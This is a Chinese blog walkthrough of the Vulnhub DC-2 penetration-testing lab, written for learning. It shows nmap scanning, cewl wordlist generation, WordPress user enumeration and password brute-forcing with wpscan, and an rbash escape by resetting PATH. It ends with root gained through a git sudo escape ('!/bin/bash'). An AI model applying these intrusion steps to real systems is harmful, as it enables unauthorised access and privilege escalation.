dc-2渗透

最新推荐文章于 2022-07-18 18:56:31 发布
最新推荐文章于 2022-07-18 18:56:31 发布
阅读量1.6k 收藏
点赞数
文章标签: 安全 unctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FODKING/article/details/120736263
版权

环境
靶场下载链接:

Download: http://www.five86.com/downloads/DC-2.zip
Download (Mirror): https://download.vulnhub.com/dc/DC-2.zip
Download (Torrent): https://download.vulnhub.com/dc/DC-2.zip.torrent ( Magnet)
靶机ip:172.16.118.2

首先利用nmap扫描
nmap -sS -P0 -sV -O 172.16.118.0/24 探测操作系统及端口
开放了web服务
进网页跳转之dc-2
这时修改hosts文件
kali中在/etc/hosts
添加
172.16.118.2 dc-2
发现页面得到flag1

#http://dc-2/index.php/flag/
Flag 1:

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

用cewl收集页面信息生成密码,

cewl:
cewl dc-2 -w 1.txt
 ⚡ root@roots  /work/DC/DC-2  cewl dc-2 -w dict.txt
CeWL 5.4.4.1 (Arkanoid) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
 ⚡ root@roots  /work/DC/DC-2  cat dict.txt 
 sit
amet
nec
quis
vel
...............

wpscan:

##wpscan --url dc-2 默认扫描
##wpscan --url dc-2 -eu  扫描用户名 (手工探测 http://dc-2/?author=1 2 3 4 5 6 ....)
⚡ root@roots  /work/DC/DC-2  wpscan --url dc-2
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.4.4
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://dc-2/
[+] Started: Tue Aug 13 14:19:38 2019

Interesting Finding(s):

[+] http://dc-2/
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Detected By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |
 | [!] 10 vulnerabilities identified:
 |
 | [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
 |     Fixed in: 4.7.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9100
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
 |      - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
 |      - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
 |      - https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
 |      - https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
 |      - https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated File Delete
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9169
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9170
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
 |
 | [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9171
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9172
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9173
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
 |
 | [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9174
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
 |     Fixed in: 4.7.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9175
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a
 |
 | [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
 |     Fixed in: 5.0.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9222
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
 |      - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
 |      - https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce
 |
 | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
 |     Fixed in: 4.7.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9230
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787
 |      - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b
 |      - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/
 |      - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2019-05-07T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.2
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Detected By: Css Style (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Detected By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==========================================> (21 / 21) 100.00% Time: 00:00:00

[+] admin
 | Detected By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jerry
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Finished: Tue Aug 13 14:42:00 2019
[+] Requests Done: 21
[+] Cached Requests: 35
[+] Data Sent: 4.394 KB
[+] Data Received: 520.309 KB
[+] Memory used: 2.758 MB
[+] Elapsed time: 00:00:05

发现三个用户 admin tom jerry
爆破
wpscan --url dc-2 -P 1.txt
得到
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
用nmap扫描靶机具体端口
nmap -sS -p- 172.16.118.2/24
发现7744端口开放
用xshell连接
设xshell 主机为靶机 端口为7744
发现jerry登不上去
tom可以
但tom权限太低
ls 发现flag3.txt
cat不能用用vim
得到提示
切换到jerry上
改变环境变量

export PATH=/usr/sbin:/usr/bin:/sbin:/bin

在这里插入图片描述
用git提权
在这里插入图片描述
sudo -l 显示自己的权限
git提权
sudo git -p --help
输入!/bin/bash
可找到最终的flag

补充
我直接从flag1调到了flag3
先补flag2
用御剑扫描到后台
http:/…/wp-admin
输入jerry的密码和用户
翻一番可看到flag2
输入tom的话权限太低flag2看不到

学习:
cewl : https://www.4hou.com/tools/14693.html
XMLRPC:
1.https://blog.knownsec.com/2015/10/wordpress-xmlrpc-brute-force-amplification-attack-analysis/
2.http://mtfly.net/179
nmap: https://www.cnblogs.com/Vinson404/p/7784829.html
rbash:
1.https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/
2.https://www.anquanke.com/post/id/173159
git提权:https://gtfobins.github.io/gtfobins/git/

FODKING
关注
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3675
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
DC系列漏洞靶场-渗透测试学习复现(DC-2)
W983079520的博客
11-03 1859
DC-2是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了vi提权和git提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-2靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个: 80(http默认端口)和运行着SSH服务的7744端口。
DC-2靶机渗透
qq_56805195的博客
07-09 356
1
DC-2 靶机渗透
Rex_Surprise的博客
05-10 279
DC-2靶机渗透 1. 渗透过程 !!!THE_ENT!!! 2. 重要信息 DC-2靶机渗透1. 渗透过程 主机发现: nmap -sP 192.168.0.1/24 发现了DC-2的IP地址: 192.168.0.131 下载主机的时候要添加dns到hosts文件 echo “192.168.0.131 dc-2 ” &gt...
DC-2 渗透测试
Darklord.W
04-13 527
DC-2渗透测试 0x00实验环境 靶机:DC-2,IP地址:192.168.8.133 测试机:Kali,IP地址:192.168.8.128; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 主机发现 Masscan以及nmap扫描 修改hosts文件,访问web 发现是wordpress的CMS并得到提示需要cewl制作针...
DC系列(2)DC-2靶机渗透
Nikris的博客
01-05 1002
DC-2
DC-4-Web渗透测试靶机
最新发布
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
DC-2靶机渗透详细过程(附靶机链接)
bwt_D的博客
06-20 336
DC-2靶机下载链接: https://pan.baidu.com/s/1g8nEs5K0MYBCfQr-bGla-w 提取码:3xt9 查看kali主机ip:ifconfig 查看靶机的MAC地址:打开虚拟机设置,点击网络适配器,选择nat 模式,点击高级。 使用nmap扫描目标ip:nmap -sP 192.168.159.0/24 对比mac地址发现,目标靶机ip为192.168.159.139 使用nmap扫描端口:nmap -A 192.168.159.139 -p 1-65535 发现8
【vulnhub】DC系列之DC-1渗透测试
Hi~ 土拨鼠
12-26 778
文章目录实验环境实验要求渗透过程文件搜索命令find文件特殊权限setUID 实验环境 目标靶机:DC-1,NAT模式 攻击机:kali,NAT模式,IP:192.168.35.131 实验要求 靶机中一共有五个flag文件,我们需要找到它们,即可完成任务。 渗透过程 使用nmap扫描当前网段存活主机: nmap -sP 192.168.35.0/24 -oN nmap.sP 简单分析可知靶机IP为192.168.35.147 使用nmap对靶机进行端口扫描: nmap -p 1-65535 -sV 1
DC-2(渗透实战演练)
weixin_44537595的博客
10-19 226
信息收集 扫描端口 访问网站发现有跳转,但是显示失败,需要我们进行ip和域名绑定 通过/etc/hosts绑定 浏览网站发现flag 大致意思说,你字典有问题,需要cewl工具生成字典 Cewl http://dc-2 -w /tmp/passwd.dict1 扫描网站目录 可以通过gobuster 、dirb、metasploit扫描 结果 /index.php (Status: 301) /wp-content (Status: 301) /wp-admin (Status: 301) .
DC-2靶机的渗透学习
里丘~班诺的小屋
09-01 1804
目录 0X00 靶机的环境搭配 0X01战前准备 一、IP扫描 二、端口扫描 三、网站目录扫描 四、查看网站结构 三、渗透开始 一、flag1 二、flag2 2.1 使用cewl生成密码 2.2 使用wpscan扫出用户 2.3 找到3个用户admin、jerry、tom,并将他们放入一个文本文件中 2.4 开始爆破 2.5登录后台网页 三、flag3 3.1 ssh登录 3.2 初步查找文件 四、flag4 4.1 绕过rbash 五、flag5 5.1..
DC-2靶机实战 渗透测试
她叫常玉莹
07-20 716
DC-2主机发现 信息搜集Flag1Flag2Flag3Flag4Final-flag 主机发现 信息搜集 nmap主机发现 我们的靶机地址是:192.168.0.131 nmap扫描 nmap -A -T4 -p- 192.168.0.131 80端口跑着http 7744端口跑着ssh Flag1 访问下80 无法访问这里修改下hosts文件 linux中hosts文件位置 /etc/hosts 这回可以正常访问了,这里有个重定向直接跳转dc-2 在主页中找到找到了flag1 flag1中
DC-2靶机渗透测试流程
qq_60463414的博客
07-18 2965
DC-2靶机渗透测试思路及流程
DC-2靶场搭建及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-02 7137
DC-2靶场渗透实战过程
一次迷迷糊糊的靶机渗透Lazsysadmin实战
weixin_44255856的博客
09-01 1233
靶机ip:192.168.85.141 kali攻击机:192.168.85.130 发现靶机开启了22,80,139,445,3306,6667端口,并且靶机运行着samba服务 先来看看80端口。 发现这个网页由Silex v2构成的 发现网站就是一个静态网页,并没有什么用。 于是用dirbuster进行目录爆破 在目录爆破中,我们发现了phpmyadmin,wordpress,...
Vulnhub DC Challenges之 DC-2
ST0new的博客
05-26 1943
前言 关于Vulnhub 以及DC,以及如何使用ova安装,我已经在DC-1中介绍了 ,今天带来第二弹,比第一弹难度稍微大一点,重点还是考察工具的使用和命令的熟练程度 附上链接Vulnhub DC Challenges之 DC-1 DC-2介绍 DC-2,我们主要是从web入手渗透拿到flag,需要大家对信息收集要有一定的了解,需要掌握的工具:nmap,hydra,cewl。 靶机环境 DC-2...
WordPress Plugin Autoptimize 2.7.6 - Authenticated Arbitrary File Upload (Metasploit)
小兰同学的博客
03-19 566
本文就WP的Autoptimize 2.7.6的插件漏洞从复现到msf模块导入并利用做了简单的步骤记录。 文章目录一、漏洞详情二、漏洞复现三、metasploit利用 参考链接 https://www.exploit-db.com/exploits/49399 https://drive.google.com/file/d/1siZsDiJsYRCw58Ksram5zBJOVbs-Hio1/view 一、漏洞详情 WordPress插件Autoptimize容易出现多个漏洞,包括跨站点脚本和任意文件上传漏洞
靶机渗透测试实战(二)——DC-2
weixin_45116657的博客
10-03 5360
1、确定目标主机、详细信息 1.1> 命令:arp-scan -l ——> 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) arp-scan命令: 是一个用来进行系统发现的ARP命令行扫描工具(可以发现本地网络中的隐藏设备)。它可以构造并发送ARP请求到指定的IP地址,并且显示返回的任何响应。 arp-scan 可以显示本地网络中的所有连接设备,即使这些设备有防火墙。设...
渗透DC-1靶机设计思路
05-24
2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FODKING

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值